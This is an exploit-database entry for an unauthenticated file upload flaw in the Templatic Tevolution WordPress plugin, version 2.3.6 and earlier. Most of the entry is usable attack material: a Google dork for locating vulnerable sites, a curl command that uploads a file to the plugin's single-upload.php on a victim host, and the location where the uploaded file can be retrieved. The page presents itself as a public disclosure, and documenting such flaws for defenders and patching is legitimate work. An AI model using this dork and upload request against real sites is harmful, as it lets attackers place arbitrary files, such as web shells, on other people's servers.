WordPress Templatic 2.3.6 File Upload

2016.12.31
Credit: r3m1ck
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability # Date: 30-12-2016 # Software Link: Permium plugin # Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution # Exploit Author: r3m1ck # Website: https://www.r3m1ck.us/ # Category: webapps # Google Dork: inurl:"wp-content/plugins/Tevolution/" 1. Description Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability. Tevolution is not available for sale, it comes bundled with certain premium themes from templatic. 2. Proof of Concept curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php 3. Uploaded file location: Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name. ex: http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top